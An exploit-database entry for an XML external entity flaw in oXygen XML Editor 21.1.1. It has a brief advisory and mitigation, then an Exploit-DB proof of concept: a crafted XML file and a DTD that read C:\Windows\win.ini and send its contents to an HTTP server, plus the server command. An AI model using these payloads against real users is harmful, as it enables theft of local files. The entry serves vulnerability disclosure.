header-logo
Suggest Exploit
vendor:
oxygen_xml_editor
by:
Pablo Santiago
7.5
CVSS
HIGH
XML External Entity Injection
611
CWE
Product Name: oxygen_xml_editor
Affected Version From: 21.1.1
Affected Version To: 21.1.1
Patch Exists: YES
Related CWE: N/A
CPE: a:oxygenxml:oxygen_xml_editor:21.1.1
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 7
2019

oXygen XML Editor 21.1.1 – XML External Entity Injection

An XML External Entity Injection (XXE) vulnerability was discovered in oXygen XML Editor 21.1.1. The vulnerability allows an attacker to read arbitrary files on the vulnerable system. The vulnerability is triggered when a user opens a malicious XML file. The malicious XML file contains an XML External Entity (XXE) declaration which references a malicious DTD file hosted on a remote server. The malicious DTD file contains an entity declaration which references a file on the vulnerable system. When the malicious XML file is opened, the vulnerable application attempts to parse the malicious DTD file, which in turn causes the vulnerable application to attempt to read the file referenced in the entity declaration. This allows an attacker to read arbitrary files on the vulnerable system.

Mitigation:

To mitigate this vulnerability, users should ensure that they are running the latest version of oXygen XML Editor. Additionally, users should ensure that they do not open untrusted XML files.
Source

Exploit-DB raw data:

# Exploit Title: oXygen XML Editor 21.1.1 - XML External Entity Injection
# Author: Pablo Santiago
# Date: 2019-11-13
# Vendor Homepage: https://www.oxygenxml.com/
# Source:https://www.oxygenxml.com/xml_editor/download_oxygenxml_editor.html
# Version: 21.1.1
# CVE : N/A
# Tested on: Windows 7

#PoC

1- python -m SimpleHTTPServer 8000
1.1- Poc.xml :
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "C:\Windows\win.ini">
<!ENTITY % dtd SYSTEM "http://localhost:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>

1.2.- payload.dtd
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8000?%file;'>">
%all;
2- File -> Open -> *.xml

#PoC Visual
https://imgur.com/2H8DhL9

Navigation

Suggest Exploit

Services By CQR